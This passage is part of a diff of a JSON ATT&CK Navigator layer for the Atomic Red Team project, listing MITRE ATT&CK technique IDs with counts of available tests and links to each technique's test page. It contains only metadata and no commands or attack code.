Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":30,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":118,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View 